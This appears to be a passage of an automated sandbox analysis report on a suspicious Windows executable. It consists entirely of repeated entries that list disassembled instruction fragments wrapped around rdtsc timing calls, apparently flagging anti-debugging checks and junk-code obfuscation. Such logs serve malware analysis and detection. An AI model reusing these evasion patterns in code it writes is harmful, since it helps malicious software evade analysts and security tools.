Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E413EF second address: E41413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnc 00007F4BA0D39714h 0x0000000d push esi 0x0000000e jl 00007F4BA0D39706h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E19BCE second address: E19BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F4BA0D3F15Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E47B58 second address: E47B67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E47F21 second address: E47F25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4CEA8 second address: E4CEB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4CEB0 second address: E4CEBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4CEBC second address: E4CEC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E16412 second address: E16425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4BA0D3F15Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4C462 second address: E4C47D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D39711h 0x00000009 jp 00007F4BA0D39706h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4C606 second address: E4C622 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4BA0D3F158h 0x00000008 jmp 00007F4BA0D3F15Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4C622 second address: E4C65A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F4BA0D39716h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F4BA0D39706h 0x00000014 jmp 00007F4BA0D39713h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4C65A second address: E4C660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4CBB2 second address: E4CBE0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4BA0D39719h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F4BA0D3970Ch 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4E6CA second address: E4E6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4EAA2 second address: E4EAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4EF9E second address: E4EFD0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a mov edi, dword ptr [ebp+122D2AF7h] 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007F4BA0D3F168h 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F4BA0D3F156h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4F1BF second address: E4F1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4F4BB second address: E4F502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F4BA0D3F158h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 pushad 0x00000024 js 00007F4BA0D3F157h 0x0000002a stc 0x0000002b adc ch, FFFFFFF5h 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F4BA0D3F15Eh 0x00000039 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4F502 second address: E4F508 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4F508 second address: E4F50F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4F9FB second address: E4F9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4F9FF second address: E4FA17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E50444 second address: E5044A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5044A second address: E5047C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F166h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4BA0D3F165h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E515B5 second address: E515B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E50C60 second address: E50C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E50C64 second address: E50C68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E50C68 second address: E50C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E52C7B second address: E52C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E52C8B second address: E52C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E52D29 second address: E52D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E52D2D second address: E52D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E52D31 second address: E52D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E52D37 second address: E52D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E52D3D second address: E52D41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E54E3E second address: E54EDA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4BA0D3F158h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F4BA0D3F158h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jne 00007F4BA0D3F16Eh 0x0000002f mov dword ptr [ebp+122D2848h], edx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F4BA0D3F158h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 0000001Ah 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 push 00000000h 0x00000053 jmp 00007F4BA0D3F166h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c jmp 00007F4BA0D3F15Ch 0x00000061 pop eax 0x00000062 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E581C1 second address: E581F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 mov bx, 7DB9h 0x0000000d push 00000000h 0x0000000f mov edi, dword ptr [ebp+1246C301h] 0x00000015 push 00000000h 0x00000017 mov bl, CAh 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4BA0D39712h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E581F1 second address: E581F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E581F5 second address: E581FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E59051 second address: E59068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D3F162h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E59F0A second address: E59F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E59F0E second address: E59F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E59F14 second address: E59F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D39711h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5AEBE second address: E5AEDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jc 00007F4BA0D3F156h 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5AEDE second address: E5AEE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5833C second address: E58342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5A090 second address: E5A09A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F4BA0D39706h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5B13E second address: E5B142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5913B second address: E59142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5D0BF second address: E5D0DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D3F166h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5DF22 second address: E5DF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4BA0D39706h 0x0000000a popad 0x0000000b push eax 0x0000000c jp 00007F4BA0D3971Fh 0x00000012 pushad 0x00000013 jmp 00007F4BA0D39711h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E59201 second address: E59205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5D0DA second address: E5D162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F4BA0D39708h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov di, C9A0h 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 mov edi, 4862E83Ah 0x0000003b mov eax, dword ptr [ebp+122D0A21h] 0x00000041 jmp 00007F4BA0D39710h 0x00000046 push FFFFFFFFh 0x00000048 push eax 0x00000049 add bx, 3F2Bh 0x0000004e pop ebx 0x0000004f nop 0x00000050 pushad 0x00000051 jmp 00007F4BA0D39713h 0x00000056 jng 00007F4BA0D39708h 0x0000005c push ebx 0x0000005d pop ebx 0x0000005e popad 0x0000005f push eax 0x00000060 push esi 0x00000061 pushad 0x00000062 push edx 0x00000063 pop edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5E059 second address: E5E05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5E05E second address: E5E075 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F4BA0D3970Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5FF6E second address: E5FF78 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4BA0D3F15Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5FF78 second address: E5FF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5FF85 second address: E5FF8F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5FF8F second address: E5FF95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E6313E second address: E63143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E63143 second address: E63149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E63149 second address: E6315F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4BA0D3F15Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E6315F second address: E63164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E601EC second address: E601F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E62249 second address: E6224F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E6224F second address: E62253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E650C5 second address: E65112 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F4BA0D39713h 0x0000000c popad 0x0000000d jmp 00007F4BA0D39719h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F4BA0D3970Ah 0x0000001b pushad 0x0000001c jnc 00007F4BA0D39706h 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E65112 second address: E65117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E66811 second address: E668B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jc 00007F4BA0D39706h 0x00000010 jmp 00007F4BA0D3970Dh 0x00000015 popad 0x00000016 jmp 00007F4BA0D39716h 0x0000001b popad 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F4BA0D39708h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 jmp 00007F4BA0D39711h 0x0000003c mov dword ptr [ebp+122D280Dh], ebx 0x00000042 push 00000000h 0x00000044 mov ebx, 2259C726h 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push ebx 0x0000004e call 00007F4BA0D39708h 0x00000053 pop ebx 0x00000054 mov dword ptr [esp+04h], ebx 0x00000058 add dword ptr [esp+04h], 00000014h 0x00000060 inc ebx 0x00000061 push ebx 0x00000062 ret 0x00000063 pop ebx 0x00000064 ret 0x00000065 mov dword ptr [ebp+122D1F09h], esi 0x0000006b xchg eax, esi 0x0000006c push ebx 0x0000006d push eax 0x0000006e push edx 0x0000006f jp 00007F4BA0D39706h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E658EC second address: E658F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E67A2E second address: E67A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E67A32 second address: E67A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4BA0D3F163h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E66B54 second address: E66B6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39710h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E66B6C second address: E66B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E66B7A second address: E66B80 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E68B25 second address: E68B2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E68B2B second address: E68B3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3970Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E67BC8 second address: E67BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E67BCC second address: E67BDD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F4BA0D39706h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E70A53 second address: E70A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E70A58 second address: E70A5D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E70E41 second address: E70E4B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4BA0D3F156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E75581 second address: E75587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7561F second address: E75623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7570B second address: E75750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007F4BA0D39706h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F4BA0D39715h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007F4BA0D39715h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E75750 second address: E75754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E75754 second address: E75758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
